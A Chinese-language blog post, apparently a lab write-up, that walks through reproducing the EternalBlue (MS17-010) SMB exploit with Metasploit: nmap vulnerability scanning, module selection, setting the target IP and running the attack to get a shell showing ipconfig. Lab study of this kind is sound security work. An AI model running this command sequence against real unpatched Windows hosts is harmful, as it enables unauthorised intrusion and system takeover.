利用Metasploit实现永恒之蓝漏洞复现

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档


前言

本次实验主要利用Linux系统自带的Metasploit实现永恒之蓝漏洞的复现,具体步骤如下:


一、永恒之蓝是什么?

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

二、实现步骤

1.sudo su

获取超级管理员权限
在这里插入图片描述

2.nmap --script=vuln 192.168.0.5

利用nmap扫描目标靶机是否存在永恒之蓝漏洞
在这里插入图片描述
发现ms17-010是永恒之蓝的序列号,目标靶机存在永恒之蓝漏洞

3.msfconsole

打开metasploit
在这里插入图片描述

4.search ms17-010

搜索永恒之蓝序列号
在这里插入图片描述

5.use 0

使用永恒之蓝模块
在这里插入图片描述

6.show options

查看配置模块
在这里插入图片描述

7.set rhosts 192.168.0.5

配置目标靶机ip
在这里插入图片描述

8.run

运行模块
在这里插入图片描述

9.成果

通过漏洞攻击得到的目标主机ipconfig在这里插入图片描述
目标主机ipconfig
在这里插入图片描述

总结

通过本次实验我了解到了Linux系统里面自带了很多有用的工具,例如Metasploit,使复杂的漏洞攻击简单化。我还了解到利用Metasploit实现漏洞攻击的步骤一般为:打开模块-配置模块-运行模块。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值